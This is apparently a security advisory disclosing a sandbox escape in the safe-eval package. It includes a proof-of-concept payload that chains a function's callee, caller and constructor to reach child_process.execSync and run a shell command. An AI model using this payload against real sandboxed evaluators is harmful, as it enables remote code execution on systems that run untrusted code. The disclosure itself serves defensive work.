All versions of safe-eval
are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a functionβs callee and caller constructors can escape the sandbox and execute arbitrary code.
For example, the payload
((() => {
const targetKey = Object.keys(this)[0];
Object.defineProperty(this, targetKey, {
get: function() {
return arguments.callee.caller.constructor(
"return global.process.mainModule.require('child_process').execSync('pwd').toString()"
)();
}
});
})();```
may be used to print the `pwd` to the console.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
## References
[GitHub Advisory](https://github.com/advisories/GHSA-9pcf-h8q9-63f6)